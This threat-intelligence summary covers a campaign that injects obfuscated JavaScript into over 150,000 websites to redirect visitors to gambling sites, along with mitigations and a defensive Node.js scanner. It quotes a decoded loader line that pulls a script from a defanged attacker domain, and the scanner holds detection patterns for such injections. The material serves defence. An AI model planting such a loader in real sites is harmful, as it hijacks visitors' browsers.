
A widespread cyberattack has compromised over 150,000 legitimate websites by injecting malicious JavaScript that redirects visitors to Chinese-language gambling platforms. The campaign, first observed in February 2025 with 35,000 infected sites, has rapidly escalated, employing obfuscated scripts and iframe injections to hijack browsers. Attackers use domains like zuizhongyj[.]com to host payloads, which display full-screen overlays mimicking legitimate gambling sites such as Bet365[^1].
TL;DR: Key Points
- Scope: 150,000+ websites compromised via JavaScript injections.
- Targets: Primarily Chinese-speaking users in China, Hong Kong, and the U.S.
- Techniques: Obfuscated scripts, iframe injections, and mobile-optimized redirections.
- Related Campaigns: Ties to DollyWay malware and VexTrio affiliate networks.
- Mitigation: Audit scripts, implement CSPs, and disable unused plugins.
Attack Mechanics and Techniques
The attackers leverage HTML entity encoding and hexadecimal (percent-encoded) obfuscation to evade detection. For example, a typical payload decodes to:

```javascript
document.write(unescape("%3Cscript src='hxxps://zuizhongyj[.]com/payload.js'%3E%3C/script%3E"));
```

This script forces redirects to gambling platforms like W88in[.]com or 551007t[.]cc. The campaign also enforces viewport tags to ensure seamless mobile redirection[^2].
Infrastructure and Attribution
The operation shares infrastructure with the DollyWay malware family, active since 2016. DollyWay hijacks sites via Traffic Direction Systems (TDS) and monetizes through affiliate networks like LosPollos and PropellerAds. Recent disruptions led attackers to shift command-and-control (C2) to Telegram channels (e.g., trafficredirect)[^3].
Mitigation Strategies
- Content Security Policies (CSPs): Restrict unauthorized script execution.
- Plugin Audits: Disable unused WordPress plugins; 10,000+ infections stem from DollyWay’s exploitation of outdated plugins[^4].
- Monitoring: Detect anomalous iframe injections or redirects via log analysis.
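As an added example (not code from the article or from any vendor it cites), the following Node.js scanner undoes the entity and percent-encoding layers described under Attack Mechanics and checks a page for the document.write loader, injected iframes and viewport tag named there, supporting the monitoring item above. The hostnames in its sample are constructed placeholders, and the rule set and allow-list are assumptions.

```javascript
// Added example (not the article's code): peel the obfuscation layers described
// above (HTML entities, then the percent-escapes unescape() undoes) and flag loaders.

// Decode numeric (&#60; &#x3C;) and the common named HTML entities.
function decodeHtmlEntities(s) {
  const named = { lt: '<', gt: '>', quot: '"', amp: '&', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#\d+|lt|gt|quot|amp|apos);/gi, (m, body) => {
    if (body[0] !== '#') return named[body.toLowerCase()];
    const code = /^#x/i.test(body) ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
    return code <= 0x10ffff ? String.fromCodePoint(code) : m;
  });
}
// Undo %XX and %uXXXX escapes, i.e. what unescape() does at runtime.
function decodePercent(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (m, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}
// Peel layers until the text stops changing (entity-encoded percent-escapes
// nest). The result is used only for matching, never rendered.
function deobfuscate(s) {
  let prev, cur = s;
  do { prev = cur; cur = decodePercent(decodeHtmlEntities(prev)); } while (cur !== prev);
  return cur;
}
// Indicators from the campaign description. viewport_meta is weak on its own
// and only meaningful alongside an injected loader or iframe.
const RULES = [
  { id: 'document_write_script', re: /document\.write\s*\([^)]*<script[^>]*\ssrc\s*=/i },
  { id: 'external_iframe', re: /<iframe[^>]+src\s*=\s*['"]?https?:\/\//i },
  { id: 'viewport_meta', re: /<meta[^>]+name\s*=\s*['"]?viewport/i },
];
// Scan one page: triggered rule ids plus every host absent from the site's own
// allow-list, in order of first appearance.
function scanPage(html, allowedHosts) {
  const text = deobfuscate(html);
  const findings = RULES.filter(r => r.re.test(text)).map(r => r.id);
  const hosts = [];
  for (const m of text.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    const h = m[1].toLowerCase();
    if (!allowedHosts.includes(h) && !hosts.includes(h)) hosts.push(h);
  }
  return { findings, externalHosts: hosts };
}
// Constructed sample (placeholder hosts): an entity-encoded iframe plus a
// percent-encoded document.write loader like the one quoted in the article.
const SAMPLE = '<meta name="viewport" content="width=device-width">' +
  '<script>document.write(unescape("%3Cscript src=\'https://loader.example/p.js\'%3E%3C/script%3E"));</script>' +
  '<div>&#60;iframe src=&quot;https://overlay.example/bet&quot;&#62;&#60;/iframe&#62;</div>';
console.log(scanPage(SAMPLE, ['www.site.example']));
```

Run it over stored page snapshots or crawled HTML and alert on any page where `document_write_script` or `external_iframe` fires together with a host outside the allow-list.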
Relevance to Security Professionals
- Red Teams: Study obfuscation techniques (e.g., HTML entity encoding) for evasion simulations.
- Blue Teams: Prioritize CSP implementation and client-side attack detection.
- Threat Intel Researchers: Track overlaps with VexTrio and DollyWay campaigns[^5].
Conclusion
This campaign highlights the growing sophistication of client-side attacks. Organizations should adopt proactive measures, such as CSPs and rigorous plugin management, to mitigate risks.
References
[^1]: “Threat Actors Compromise 150,000 Websites to Promote Chinese Gambling Platforms”. GBHackers. [Accessed March 27, 2025].
[^2]: “150,000+ Websites Hijacked via JavaScript Injection for Gambling Redirects”. The Hacker News. [Accessed March 27, 2025].
[^3]: Denis Sinegubko (GoDaddy): “DollyWay’s shift to Telegram for redirects shows adaptability post-LosPollos disruption.”
[^4]: Himanshu Anand (c/side): “Client-side attacks like these are on the rise, with more findings daily.”
[^5]: Malware.news, DeveloperTech, Cyber Syrup. [Accessed March 27, 2025].